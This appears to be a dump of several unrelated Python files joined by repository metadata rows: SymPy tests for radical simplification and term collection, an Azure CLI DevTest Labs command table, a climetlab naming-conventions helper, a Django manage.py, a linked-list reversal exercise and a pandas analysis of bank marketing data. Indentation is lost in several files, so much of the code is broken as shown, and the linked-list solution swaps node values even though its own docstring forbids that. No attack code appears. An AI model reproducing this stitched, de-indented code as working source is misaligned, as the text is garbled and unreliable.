assert len((3616791619821680643598*z).args) == 16
assert radsimp(1/z) == 1/z
assert radsimp(1/z, max_terms=20).expand() == 1 + r2/3 + r3/5 + r5 + r7
assert radsimp(1/(r2*3)) == \
sqrt(2)/6
assert radsimp(1/(r2*a + r3 + r5 + r7)) == (
(8*sqrt(2)*a**7 - 8*sqrt(7)*a**6 - 8*sqrt(5)*a**6 - 8*sqrt(3)*a**6 -
180*sqrt(2)*a**5 + 8*sqrt(30)*a**5 + 8*sqrt(42)*a**5 + 8*sqrt(70)*a**5
- 24*sqrt(105)*a**4 + 84*sqrt(3)*a**4 + 100*sqrt(5)*a**4 +
116*sqrt(7)*a**4 - 72*sqrt(70)*a**3 - 40*sqrt(42)*a**3 -
8*sqrt(30)*a**3 + 782*sqrt(2)*a**3 - 462*sqrt(3)*a**2 -
302*sqrt(7)*a**2 - 254*sqrt(5)*a**2 + 120*sqrt(105)*a**2 -
795*sqrt(2)*a - 62*sqrt(30)*a + 82*sqrt(42)*a + 98*sqrt(70)*a -
118*sqrt(105) + 59*sqrt(7) + 295*sqrt(5) + 531*sqrt(3))/(16*a**8 -
480*a**6 + 3128*a**4 - 6360*a**2 + 3481))
assert radsimp(1/(r2*a + r2*b + r3 + r7)) == (
(sqrt(2)*a*(a + b)**2 - 5*sqrt(2)*a + sqrt(42)*a + sqrt(2)*b*(a +
b)**2 - 5*sqrt(2)*b + sqrt(42)*b - sqrt(7)*(a + b)**2 - sqrt(3)*(a +
b)**2 - 2*sqrt(3) + 2*sqrt(7))/(2*a**4 + 8*a**3*b + 12*a**2*b**2 -
20*a**2 + 8*a*b**3 - 40*a*b + 2*b**4 - 20*b**2 + 8))
assert radsimp(1/(r2*a + r2*b + r2*c + r2*d)) == \
sqrt(2)/(2*a + 2*b + 2*c + 2*d)
assert radsimp(1/(1 + r2*a + r2*b + r2*c + r2*d)) == (
(sqrt(2)*a + sqrt(2)*b + sqrt(2)*c + sqrt(2)*d - 1)/(2*a**2 + 4*a*b +
4*a*c + 4*a*d + 2*b**2 + 4*b*c + 4*b*d + 2*c**2 + 4*c*d + 2*d**2 - 1))
assert radsimp((y**2 - x)/(y - sqrt(x))) == \
sqrt(x) + y
assert radsimp(-(y**2 - x)/(y - sqrt(x))) == \
-(sqrt(x) + y)
assert radsimp(1/(1 - I + a*I)) == \
(-I*a + 1 + I)/(a**2 - 2*a + 2)
assert radsimp(1/((-x + y)*(x - sqrt(y)))) == \
(-x - sqrt(y))/((x - y)*(x**2 - y))
e = (3 + 3*sqrt(2))*x*(3*x - 3*sqrt(y))
assert radsimp(e) == x*(3 + 3*sqrt(2))*(3*x - 3*sqrt(y))
assert radsimp(1/e) == (
(-9*x + 9*sqrt(2)*x - 9*sqrt(y) + 9*sqrt(2)*sqrt(y))/(9*x*(9*x**2 -
9*y)))
assert radsimp(1 + 1/(1 + sqrt(3))) == \
Mul(S.Half, -1 + sqrt(3), evaluate=False) + 1
A = symbols("A", commutative=False)
assert radsimp(x**2 + sqrt(2)*x**2 - sqrt(2)*x*A) == \
x**2 + sqrt(2)*x**2 - sqrt(2)*x*A
assert radsimp(1/sqrt(5 + 2 * sqrt(6))) == -sqrt(2) + sqrt(3)
assert radsimp(1/sqrt(5 + 2 * sqrt(6))**3) == -(-sqrt(3) + sqrt(2))**3
# issue 6532
assert fraction(radsimp(1/sqrt(x))) == (sqrt(x), x)
assert fraction(radsimp(1/sqrt(2*x + 3))) == (sqrt(2*x + 3), 2*x + 3)
assert fraction(radsimp(1/sqrt(2*(x + 3)))) == (sqrt(2*x + 6), 2*x + 6)
# issue 5994
e = S('-(2 + 2*sqrt(2) + 4*2**(1/4))/'
'(1 + 2**(3/4) + 3*2**(1/4) + 3*sqrt(2))')
assert radsimp(e).expand() == -2*2**Rational(3, 4) - 2*2**Rational(1, 4) + 2 + 2*sqrt(2)
    # issue 5986 (modifications to radsimp didn't initially recognize this so
# the test is included here)
assert radsimp(1/(-sqrt(5)/2 - S.Half + (-sqrt(5)/2 - S.Half)**2)) == 1
# from issue 5934
eq = (
(-240*sqrt(2)*sqrt(sqrt(5) + 5)*sqrt(8*sqrt(5) + 40) -
360*sqrt(2)*sqrt(-8*sqrt(5) + 40)*sqrt(-sqrt(5) + 5) -
120*sqrt(10)*sqrt(-8*sqrt(5) + 40)*sqrt(-sqrt(5) + 5) +
120*sqrt(2)*sqrt(-sqrt(5) + 5)*sqrt(8*sqrt(5) + 40) +
120*sqrt(2)*sqrt(-8*sqrt(5) + 40)*sqrt(sqrt(5) + 5) +
120*sqrt(10)*sqrt(-sqrt(5) + 5)*sqrt(8*sqrt(5) + 40) +
120*sqrt(10)*sqrt(-8*sqrt(5) + 40)*sqrt(sqrt(5) + 5))/(-36000 -
7200*sqrt(5) + (12*sqrt(10)*sqrt(sqrt(5) + 5) +
24*sqrt(10)*sqrt(-sqrt(5) + 5))**2))
assert radsimp(eq) is S.NaN # it's 0/0
# work with normal form
e = 1/sqrt(sqrt(7)/7 + 2*sqrt(2) + 3*sqrt(3) + 5*sqrt(5)) + 3
assert radsimp(e) == (
-sqrt(sqrt(7) + 14*sqrt(2) + 21*sqrt(3) +
35*sqrt(5))*(-11654899*sqrt(35) - 1577436*sqrt(210) - 1278438*sqrt(15)
- 1346996*sqrt(10) + 1635060*sqrt(6) + 5709765 + 7539830*sqrt(14) +
8291415*sqrt(21))/1300423175 + 3)
# obey power rules
base = sqrt(3) - sqrt(2)
assert radsimp(1/base**3) == (sqrt(3) + sqrt(2))**3
assert radsimp(1/(-base)**3) == -(sqrt(2) + sqrt(3))**3
assert radsimp(1/(-base)**x) == (-base)**(-x)
assert radsimp(1/base**x) == (sqrt(2) + sqrt(3))**x
assert radsimp(root(1/(-1 - sqrt(2)), -x)) == (-1)**(-1/x)*(1 + sqrt(2))**(1/x)
# recurse
e = cos(1/(1 + sqrt(2)))
assert radsimp(e) == cos(-sqrt(2) + 1)
assert radsimp(e/2) == cos(-sqrt(2) + 1)/2
assert radsimp(1/e) == 1/cos(-sqrt(2) + 1)
assert radsimp(2/e) == 2/cos(-sqrt(2) + 1)
assert fraction(radsimp(e/sqrt(x))) == (sqrt(x)*cos(-sqrt(2)+1), x)
# test that symbolic denominators are not processed
r = 1 + sqrt(2)
assert radsimp(x/r, symbolic=False) == -x*(-sqrt(2) + 1)
assert radsimp(x/(y + r), symbolic=False) == x/(y + 1 + sqrt(2))
assert radsimp(x/(y + r)/r, symbolic=False) == \
-x*(-sqrt(2) + 1)/(y + 1 + sqrt(2))
# issue 7408
eq = sqrt(x)/sqrt(y)
assert radsimp(eq) == umul(sqrt(x), sqrt(y), 1/y)
assert radsimp(eq, symbolic=False) == eq
# issue 7498
assert radsimp(sqrt(x)/sqrt(y)**3) == umul(sqrt(x), sqrt(y**3), 1/y**3)
# for coverage
eq = sqrt(x)/y**2
assert radsimp(eq) == eq
def test_radsimp_issue_3214():
c, p = symbols('c p', positive=True)
s = sqrt(c**2 - p**2)
b = (c + I*p - s)/(c + I*p + s)
assert radsimp(b) == -I*(c + I*p - sqrt(c**2 - p**2))**2/(2*c*p)
def test_collect_1():
"""Collect with respect to a Symbol"""
x, y, z, n = symbols('x,y,z,n')
assert collect(1, x) == 1
assert collect( x + y*x, x ) == x * (1 + y)
assert collect( x + x**2, x ) == x + x**2
assert collect( x**2 + y*x**2, x ) == (x**2)*(1 + y)
assert collect( x**2 + y*x, x ) == x*y + x**2
assert collect( 2*x**2 + y*x**2 + 3*x*y, [x] ) == x**2*(2 + y) + 3*x*y
assert collect( 2*x**2 + y*x**2 + 3*x*y, [y] ) == 2*x**2 + y*(x**2 + 3*x)
assert collect( ((1 + y + x)**4).expand(), x) == ((1 + y)**4).expand() + \
x*(4*(1 + y)**3).expand() + x**2*(6*(1 + y)**2).expand() + \
x**3*(4*(1 + y)).expand() + x**4
# symbols can be given as any iterable
expr = x + y
assert collect(expr, expr.free_symbols) == expr
def test_collect_2():
"""Collect with respect to a sum"""
a, b, x = symbols('a,b,x')
assert collect(a*(cos(x) + sin(x)) + b*(cos(x) + sin(x)),
sin(x) + cos(x)) == (a + b)*(cos(x) + sin(x))
def test_collect_3():
"""Collect with respect to a product"""
a, b, c = symbols('a,b,c')
f = Function('f')
x, y, z, n = symbols('x,y,z,n')
assert collect(-x/8 + x*y, -x) == x*(y - Rational(1, 8))
assert collect( 1 + x*(y**2), x*y ) == 1 + x*(y**2)
assert collect( x*y + a*x*y, x*y) == x*y*(1 + a)
assert collect( 1 + x*y + a*x*y, x*y) == 1 + x*y*(1 + a)
assert collect(a*x*f(x) + b*(x*f(x)), x*f(x)) == x*(a + b)*f(x)
assert collect(a*x*log(x) + b*(x*log(x)), x*log(x)) == x*(a + b)*log(x)
assert collect(a*x**2*log(x)**2 + b*(x*log(x))**2, x*log(x)) == \
x**2*log(x)**2*(a + b)
# with respect to a product of three symbols
assert collect(y*x*z + a*x*y*z, x*y*z) == (1 + a)*x*y*z
def test_collect_4():
"""Collect with respect to a power"""
a, b, c, x = symbols('a,b,c,x')
assert collect(a*x**c + b*x**c, x**c) == x**c*(a + b)
    # issue 6096: 2 stays with c (unless c is integer or x is positive)
assert collect(a*x**(2*c) + b*x**(2*c), x**c) == x**(2*c)*(a + b)
def test_collect_5():
"""Collect with respect to a tuple"""
a, x, y, z, n = symbols('a,x,y,z,n')
assert collect(x**2*y**4 + z*(x*y**2)**2 + z + a*z, [x*y**2, z]) in [
z*(1 + a + x**2*y**4) + x**2*y**4,
z*(1 + a) + x**2*y**4*(1 + z) ]
assert collect((1 + (x + y) + (x + y)**2).expand(),
[x, y]) == 1 + y + x*(1 + 2*y) + x**2 + y**2
def test_collect_pr19431():
"""Unevaluated collect with respect to a product"""
a = symbols('a')
assert collect(a**2*(a**2 + 1), a**2, evaluate=False)[a**2] == (a**2 + 1)
def test_collect_D():
D = Derivative
f = Function('f')
x, a, b = symbols('x,a,b')
fx = D(f(x), x)
fxx = D(f(x), x, x)
assert collect(a*fx + b*fx, fx) == (a + b)*fx
assert collect(a*D(fx, x) + b*D(fx, x), fx) == (a + b)*D(fx, x)
assert collect(a*fxx + b*fxx, fx) == (a + b)*D(fx, x)
# issue 4784
assert collect(5*f(x) + 3*fx, fx) == 5*f(x) + 3*fx
assert collect(f(x) + f(x)*diff(f(x), x) + x*diff(f(x), x)*f(x), f(x).diff(x)) == \
(x*f(x) + f(x))*D(f(x), x) + f(x)
assert collect(f(x) + f(x)*diff(f(x), x) + x*diff(f(x), x)*f(x), f(x).diff(x), exact=True) == \
(x*f(x) + f(x))*D(f(x), x) + f(x)
assert collect(1/f(x) + 1/f(x)*diff(f(x), x) + x*diff(f(x), x)/f(x), f(x).diff(x), exact=True) == \
(1/f(x) + x/f(x))*D(f(x), x) + 1/f(x)
e = (1 + x*fx + fx)/f(x)
assert collect(e.expand(), fx) == fx*(x/f(x) + 1/f(x)) + 1/f(x)
def test_collect_func():
f = ((x + a + 1)**3).expand()
assert collect(f, x) == a**3 + 3*a**2 + 3*a + x**3 + x**2*(3*a + 3) + \
x*(3*a**2 + 6*a + 3) + 1
assert collect(f, x, factor) == x**3 + 3*x**2*(a + 1) + 3*x*(a + 1)**2 + \
(a + 1)**3
assert collect(f, x, evaluate=False) == {
S.One: a**3 + 3*a**2 + 3*a + 1,
x: 3*a**2 + 6*a + 3, x**2: 3*a + 3,
x**3: 1
}
assert collect(f, x, factor, evaluate=False) == {
S.One: (a + 1)**3, x: 3*(a + 1)**2,
x**2: umul(S(3), a + 1), x**3: 1}
def test_collect_order():
a, b, x, t = symbols('a,b,x,t')
assert collect(t + t*x + t*x**2 + O(x**3), t) == t*(1 + x + x**2 + O(x**3))
assert collect(t + t*x + x**2 + O(x**3), t) == \
t*(1 + x + O(x**3)) + x**2 + O(x**3)
f = a*x + b*x + c*x**2 + d*x**2 + O(x**3)
g = x*(a + b) + x**2*(c + d) + O(x**3)
assert collect(f, x) == g
assert collect(f, x, distribute_order_term=False) == g
f = sin(a + b).series(b, 0, 10)
assert collect(f, [sin(a), cos(a)]) == \
sin(a)*cos(b).series(b, 0, 10) + cos(a)*sin(b).series(b, 0, 10)
assert collect(f, [sin(a), cos(a)], distribute_order_term=False) == \
sin(a)*cos(b).series(b, 0, 10).removeO() + \
cos(a)*sin(b).series(b, 0, 10).removeO() + O(b**10)
def test_rcollect():
assert rcollect((x**2*y + x*y + x + y)/(x + y), y) == \
(x + y*(1 + x + x**2))/(x + y)
assert rcollect(sqrt(-((x + 1)*(y + 1))), z) == sqrt(-((x + 1)*(y + 1)))
def test_collect_D_0():
D = Derivative
f = Function('f')
x, a, b = symbols('x,a,b')
fxx = D(f(x), x, x)
assert collect(a*fxx + b*fxx, fxx) == (a + b)*fxx
def test_collect_Wild():
"""Collect with respect to functions with Wild argument"""
a, b, x, y = symbols('a b x y')
f = Function('f')
w1 = Wild('.1')
w2 = Wild('.2')
assert collect(f(x) + a*f(x), f(w1)) == (1 + a)*f(x)
assert collect(f(x, y) + a*f(x, y), f(w1)) == f(x, y) + a*f(x, y)
assert collect(f(x, y) + a*f(x, y), f(w1, w2)) == (1 + a)*f(x, y)
assert collect(f(x, y) + a*f(x, y), f(w1, w1)) == f(x, y) + a*f(x, y)
assert collect(f(x, x) + a*f(x, x), f(w1, w1)) == (1 + a)*f(x, x)
assert collect(a*(x + 1)**y + (x + 1)**y, w1**y) == (1 + a)*(x + 1)**y
assert collect(a*(x + 1)**y + (x + 1)**y, w1**b) == \
a*(x + 1)**y + (x + 1)**y
assert collect(a*(x + 1)**y + (x + 1)**y, (x + 1)**w2) == \
(1 + a)*(x + 1)**y
assert collect(a*(x + 1)**y + (x + 1)**y, w1**w2) == (1 + a)*(x + 1)**y
def test_collect_const():
# coverage not provided by above tests
assert collect_const(2*sqrt(3) + 4*a*sqrt(5)) == \
2*(2*sqrt(5)*a + sqrt(3)) # let the primitive reabsorb
assert collect_const(2*sqrt(3) + 4*a*sqrt(5), sqrt(3)) == \
2*sqrt(3) + 4*a*sqrt(5)
assert collect_const(sqrt(2)*(1 + sqrt(2)) + sqrt(3) + x*sqrt(2)) == \
sqrt(2)*(x + 1 + sqrt(2)) + sqrt(3)
# issue 5290
assert collect_const(2*x + 2*y + 1, 2) == \
collect_const(2*x + 2*y + 1) == \
Add(S.One, Mul(2, x + y, evaluate=False), evaluate=False)
assert collect_const(-y - z) == Mul(-1, y + z, evaluate=False)
assert collect_const(2*x - 2*y - 2*z, 2) == \
Mul(2, x - y - z, evaluate=False)
assert collect_const(2*x - 2*y - 2*z, -2) == \
_unevaluated_Add(2*x, Mul(-2, y + z, evaluate=False))
# this is why the content_primitive is used
eq = (sqrt(15 + 5*sqrt(2))*x + sqrt(3 + sqrt(2))*y)*2
assert collect_sqrt(eq + 2) == \
2*sqrt(sqrt(2) + 3)*(sqrt(5)*x + y) + 2
# issue 16296
assert collect_const(a + b + x/2 + y/2) == a + b + Mul(S.Half, x + y, evaluate=False)
def test_issue_13143():
f = Function('f')
fx = f(x).diff(x)
e = f(x) + fx + f(x)*fx
# collect function before derivative
assert collect(e, Wild('w')) == f(x)*(fx + 1) + fx
e = f(x) + f(x)*fx + x*fx*f(x)
assert collect(e, fx) == (x*f(x) + f(x))*fx + f(x)
assert collect(e, f(x)) == (x*fx + fx + 1)*f(x)
e = f(x) + fx + f(x)*fx
assert collect(e, [f(x), fx]) == f(x)*(1 + fx) + fx
assert collect(e, [fx, f(x)]) == fx*(1 + f(x)) + f(x)
def test_issue_6097():
assert collect(a*y**(2.0*x) + b*y**(2.0*x), y**x) == (a + b)*(y**x)**2.0
assert collect(a*2**(2.0*x) + b*2**(2.0*x), 2**x) == (a + b)*(2**x)**2.0
def test_fraction_expand():
eq = (x + y)*y/x
assert eq.expand(frac=True) == fraction_expand(eq) == (x*y + y**2)/x
assert eq.expand() == y + y**2/x
def test_fraction():
x, y, z = map(Symbol, 'xyz')
A = Symbol('A', commutative=False)
assert fraction(S.Half) == (1, 2)
assert fraction(x) == (x, 1)
assert fraction(1/x) == (1, x)
assert fraction(x/y) == (x, y)
assert fraction(x/2) == (x, 2)
assert fraction(x*y/z) == (x*y, z)
assert fraction(x/(y*z)) == (x, y*z)
assert fraction(1/y**2) == (1, y**2)
assert fraction(x/y**2) == (x, y**2)
assert fraction((x**2 + 1)/y) == (x**2 + 1, y)
assert fraction(x*(y + 1)/y**7) == (x*(y + 1), y**7)
assert fraction(exp(-x), exact=True) == (exp(-x), 1)
assert fraction((1/(x + y))/2, exact=True) == (1, Mul(2,(x + y), evaluate=False))
assert fraction(x*A/y) == (x*A, y)
assert fraction(x*A**-1/y) == (x*A**-1, y)
n = symbols('n', negative=True)
assert fraction(exp(n)) == (1, exp(-n))
assert fraction(exp(-n)) == (exp(-n), 1)
p = symbols('p', positive=True)
assert fraction(exp(-p)*log(p), exact=True) == (exp(-p)*log(p), 1)
def test_issue_5615():
aA, Re, a, b, D = symbols('aA Re a b D')
e = ((D**3*a + b*aA**3)/Re).expand()
assert collect(e, [aA**3/Re, a]) == e
def test_issue_5933():
from sympy import Polygon, RegularPolygon, denom
x = Polygon(*RegularPolygon((0, 0), 1, 5).vertices).centroid.x
assert abs(denom(x).n()) > 1e-12
assert abs(denom(radsimp(x))) > 1e-12 # in case simplify didn't handle it
def test_issue_14608():
a, b = symbols('a b', commutative=False)
x, y = symbols('x y')
raises(AttributeError, lambda: collect(a*b + b*a, a))
assert collect(x*y + y*(x+1), a) == x*y + y*(x+1)
assert collect(x*y + y*(x+1) + a*b + b*a, y) == y*(2*x + 1) + a*b + b*a
def test_collect_abs():
s = abs(x) + abs(y)
assert collect_abs(s) == s
assert unchanged(Mul, abs(x), abs(y))
ans = Abs(x*y)
assert isinstance(ans, Abs)
assert collect_abs(abs(x)*abs(y)) == ans
assert collect_abs(1 + exp(abs(x)*abs(y))) == 1 + exp(ans)
# See https://github.com/sympy/sympy/issues/12910
p = Symbol('p', positive=True)
assert collect_abs(p/abs(1-p)).is_commutative is True
def test_issue_19149():
eq = exp(3*x/4)
assert collect(eq, exp(x)) == eq
| 37.92053 | 103 | 0.493946 |
7a5516fd96fc5cff46aadcb216523028d5d9b37f | 5,041 | py | Python | src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/commands.py | saurabsa/azure-cli-old | f77477a98c9aa9cb55daf5b0d2f410d1455a9225 | [
"MIT"
] | null | null | null | src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/commands.py | saurabsa/azure-cli-old | f77477a98c9aa9cb55daf5b0d2f410d1455a9225 | [
"MIT"
] | null | null | null | src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/commands.py | saurabsa/azure-cli-old | f77477a98c9aa9cb55daf5b0d2f410d1455a9225 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from ._client_factory import (get_devtestlabs_virtual_machine_operation,
get_devtestlabs_custom_image_operation,
get_devtestlabs_gallery_image_operation,
get_devtestlabs_artifact_operation,
get_devtestlabs_artifact_source_operation,
get_devtestlabs_lab_operation,
get_devtestlabs_virtual_network_operation,
get_devtestlabs_formula_operation)
from azure.cli.core.sdk.util import (ServiceGroup, create_service_adapter)
custom_path = 'azure.cli.command_modules.lab.custom'
mgmt_operations_path = 'azure.cli.command_modules.lab.sdk.devtestlabs.operations.{}'
# Custom Command's service adapter
custom_operations = create_service_adapter(custom_path)
# Virtual Machine Operations Commands
virtual_machine_operations = create_service_adapter(
mgmt_operations_path.format('virtual_machine_operations'),
'VirtualMachineOperations')
with ServiceGroup(__name__, get_devtestlabs_virtual_machine_operation,
virtual_machine_operations) as s:
with s.group('lab vm') as c:
c.command('show', 'get_resource')
c.command('list', 'list')
c.command('delete', 'delete_resource')
c.command('start', 'start')
c.command('stop', 'stop')
c.command('apply-artifacts', 'apply_artifacts')
# Virtual Machine Operations Custom Commands
with ServiceGroup(__name__, get_devtestlabs_virtual_machine_operation,
custom_operations) as s:
with s.group('lab vm') as c:
c.command('list', 'list_vm')
# Lab Operations Custom Commands
with ServiceGroup(__name__, get_devtestlabs_lab_operation,
custom_operations) as s:
with s.group('lab vm') as c:
c.command('create', 'create_lab_vm')
lab_operations = create_service_adapter(mgmt_operations_path.format('lab_operations'),
'LabOperations')
# Lab Operations Commands
with ServiceGroup(__name__, get_devtestlabs_lab_operation,
lab_operations) as s:
with s.group('lab') as c:
c.command('get', 'get_resource')
# Custom Image Operations Commands
custom_image_operations = create_service_adapter(
mgmt_operations_path.format('custom_image_operations'),
'CustomImageOperations')
with ServiceGroup(__name__, get_devtestlabs_custom_image_operation,
custom_image_operations) as s:
with s.group('lab custom-image') as c:
c.command('show', 'get_resource')
c.command('list', 'list')
c.command('delete', 'delete_resource')
# Gallery Image Operations Commands
gallery_image_operations = create_service_adapter(
mgmt_operations_path.format('gallery_image_operations'),
'GalleryImageOperations')
with ServiceGroup(__name__, get_devtestlabs_gallery_image_operation,
gallery_image_operations) as s:
with s.group('lab gallery-image') as c:
c.command('list', 'list')
# Artifact Operations Commands
artifact_operations = create_service_adapter(
mgmt_operations_path.format('artifact_operations'),
'ArtifactOperations')
with ServiceGroup(__name__, get_devtestlabs_artifact_operation,
artifact_operations) as s:
with s.group('lab artifact') as c:
c.command('list', 'list')
# Artifact Source Operations Commands
artifact_source_operations = create_service_adapter(
mgmt_operations_path.format('artifact_source_operations'),
'ArtifactSourceOperations')
with ServiceGroup(__name__, get_devtestlabs_artifact_source_operation,
artifact_source_operations) as s:
with s.group('lab artifact-source') as c:
c.command('list', 'list')
c.command('get', 'get_resource')
# Virtual Network Operations Commands
virtual_network_operations = create_service_adapter(
mgmt_operations_path.format('virtual_network_operations'),
'VirtualNetworkOperations')
with ServiceGroup(__name__, get_devtestlabs_virtual_network_operation,
virtual_network_operations) as s:
with s.group('lab vnet') as c:
c.command('list', 'list')
c.command('get', 'get_resource')
# Formula Operations Commands
formula_operations = create_service_adapter(
mgmt_operations_path.format('formula_operations'),
'FormulaOperations')
with ServiceGroup(__name__, get_devtestlabs_formula_operation,
formula_operations) as s:
with s.group('lab formula') as c:
c.command('get', 'get_resource')
c.command('list', 'list')
c.command('delete', 'delete_resource')
| 40.328 | 94 | 0.677048 |
eb1bb085bf9629b4e7e1aa8eec163a1199c1829f | 1,583 | py | Python | climetlab/utils/conventions.py | mikewcasale/climetlab | 924aa602dcd638ff1a49a9d8b4b6f7bd29361d1e | [
"Apache-2.0"
] | 3 | 2021-07-23T02:06:08.000Z | 2022-02-15T01:17:15.000Z | climetlab/utils/conventions.py | mikewcasale/climetlab | 924aa602dcd638ff1a49a9d8b4b6f7bd29361d1e | [
"Apache-2.0"
] | null | null | null | climetlab/utils/conventions.py | mikewcasale/climetlab | 924aa602dcd638ff1a49a9d8b4b6f7bd29361d1e | [
"Apache-2.0"
] | 2 | 2021-11-02T13:19:48.000Z | 2021-12-29T08:38:45.000Z | # (C) Copyright 2021 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#
import logging
import os
import re
from collections import defaultdict
import yaml
from climetlab.decorators import locked
ALIASES = {}
CONVENTIONS = defaultdict(dict)
SEP = "@"
@locked
def get_alias_and_conventions():
"""fill the global variable from the relevant yaml file"""
if ALIASES:
return ALIASES, CONVENTIONS
path = os.path.join(os.path.dirname(__file__), "conventions.yaml")
with open(path) as f:
mappings = yaml.load(f.read(), Loader=yaml.SafeLoader)["parameter_name"]
def split_mapping(key):
m = re.match(f"([^{SEP}]*){SEP}(.*)", key)
if not m:
return None, key
return m.groups()
for i, m in enumerate(mappings):
for conv_key in m:
convention, key = split_mapping(conv_key)
if convention:
CONVENTIONS[convention][i] = key
ALIASES[key] = i
return ALIASES, CONVENTIONS
def normalise_string(key, convention="cf"):
aliases, conventions = get_alias_and_conventions()
i = aliases.get(key, key)
c = conventions[convention]
new = c.get(i, key)
logging.debug(f"Normalising '{key}' into '{new}' ({c} convention)")
return new
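# Example call (the key is hypothetical; the returned name depends entirely on the
# aliases defined in conventions.yaml):
# cf_name = normalise_string("2t", convention="cf")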
| 27.293103 | 80 | 0.669615 |
245ff6078f22a05c134f71cf0d3438bc645d3d5b | 537 | py | Python | seend/manage.py | kelvinndmo/seend | 5a6117cd65c2f20a99a02f0c3176e607cad56b5a | [
"MIT"
] | null | null | null | seend/manage.py | kelvinndmo/seend | 5a6117cd65c2f20a99a02f0c3176e607cad56b5a | [
"MIT"
] | 5 | 2019-02-18T15:44:37.000Z | 2019-02-22T07:13:40.000Z | seend/manage.py | kelvinndmo/seend | 5a6117cd65c2f20a99a02f0c3176e607cad56b5a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'seend.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.5625 | 73 | 0.685289 |
db97bbe413ba1220afc275d839b7037e93b8c10f | 1,511 | py | Python | #25 Reverse Nodes in k-Group.py | medisean/leetcode | f218fb738fb2b57f5eea3795a0a02cf495561465 | [
"MIT"
] | null | null | null | #25 Reverse Nodes in k-Group.py | medisean/leetcode | f218fb738fb2b57f5eea3795a0a02cf495561465 | [
"MIT"
] | null | null | null | #25 Reverse Nodes in k-Group.py | medisean/leetcode | f218fb738fb2b57f5eea3795a0a02cf495561465 | [
"MIT"
] | null | null | null | '''
Given a linked list, reverse the nodes of a linked list k at a time and return its modified list.
k is a positive integer and is less than or equal to the length of the linked list. If the number of nodes is not a multiple of k then left-out nodes in the end should remain as it is.
Example:
Given this linked list: 1->2->3->4->5
For k = 2, you should return: 2->1->4->3->5
For k = 3, you should return: 3->2->1->4->5
Note:
Only constant extra memory is allowed.
You may not alter the values in the list's nodes, only nodes itself may be changed.
'''
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def PrintSelf(self):
p = self
while p != None:
print(p.val, "-->")
p = p.next
class Solution:
def reverseKGroup(self, head: ListNode, k: int) -> ListNode:
if k == 0:
return head
nodes = []
p = head
while p != None:
nodes.append(p)
p = p.next
for i in range(int(len(nodes)/k)):
for j in range(0, int(k/2)):
nodes[i * k + j].val, nodes[(i + 1) * k - j - 1].val = nodes[(i + 1) * k - j - 1].val, nodes[i * k + j].val
return head
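# The solution above swaps node values, which yields the expected order but not
# the note's requirement that only the nodes themselves be rearranged. A minimal
# pointer-reversal sketch (illustrative addition, not part of the original file):
def reverse_k_group_links(head: ListNode, k: int) -> ListNode:
    # Check that at least k nodes remain; otherwise leave the tail untouched.
    node, count = head, 0
    while node and count < k:
        node, count = node.next, count + 1
    if count < k:
        return head
    # Recursively process the remainder, then reverse the first k nodes onto it.
    prev, curr = reverse_k_group_links(node, k), head
    for _ in range(k):
        nxt = curr.next
        curr.next = prev
        prev, curr = curr, nxt
    return prev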
if __name__ == '__main__':
l1 = ListNode(1)
l2 = ListNode(2)
l3 = ListNode(3)
l4 = ListNode(4)
l5 = ListNode(5)
l1.next = l2
l2.next = l3
l3.next = l4
l4.next = l5
solution = Solution()
solution.reverseKGroup(l1, 2).PrintSelf() | 27.472727 | 184 | 0.566512 |
90b22aa706928b2a9d26a94f7438aa8d08c9bb29 | 5,952 | py | Python | Bank.py | varundinesh/awesome-project-ideas | ed732f9a03b3ed58fbd13257b25ddf508fd6d3cb | [
"MIT"
] | null | null | null | Bank.py | varundinesh/awesome-project-ideas | ed732f9a03b3ed58fbd13257b25ddf508fd6d3cb | [
"MIT"
] | null | null | null | Bank.py | varundinesh/awesome-project-ideas | ed732f9a03b3ed58fbd13257b25ddf508fd6d3cb | [
"MIT"
] | null | null | null |
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
data=pd.read_csv('F:\\bank-additional-full.csv',sep=';')
# In[2]:
data.shape
# In[3]:
tot=len(set(data.index))
last=data.shape[0]-tot
last
# In[4]:
data.isnull().sum()
# In[5]:
print(data.y.value_counts())
sns.countplot(x='y', data=data)
plt.show()
# In[6]:
cat=data.select_dtypes(include=['object']).columns
cat
# In[7]:
for c in cat:
print(c)
print("-"*50)
print(data[c].value_counts())
print("-"*50)
# In[8]:
from sklearn.preprocessing import LabelEncoder,OneHotEncoder
le=LabelEncoder()
data['y']=le.fit_transform(data['y'])
# In[9]:
data.drop('poutcome',axis=1,inplace=True)
# In[10]:
print( data['age'].quantile(q = 0.75) +
1.5*(data['age'].quantile(q = 0.75) - data['age'].quantile(q = 0.25)))
# In[11]:
data['age'] = data['age'].where(data['age'] < 69.6)  # mask outlier ages as NaN so the fillna below can replace them
data['age'].fillna(int(data['age'].mean()),inplace=True)
# In[12]:
data['age'].values
# In[13]:
data[['age','y']].groupby(['age'],as_index=False).mean().sort_values(by='y', ascending=False)
# In[14]:
# for x in data:
# x['Sex'] = x['Sex'].map( {'female': 1, 'male': 0}).astype(int)
# In[15]:
data['age_slice'] = pd.cut(data['age'],5)
data[['age_slice', 'y']].groupby(['age_slice'], as_index=False).mean().sort_values(by='age_slice', ascending=True)
# In[16]:
data['age'] = data['age'].astype(int)
data.loc[(data['age'] >= 16) & (data['age'] <= 28), 'age'] = 1
data.loc[(data['age'] > 28) & (data['age'] <= 38), 'age'] = 2
data.loc[(data['age'] > 38) & (data['age'] <= 49), 'age'] = 3
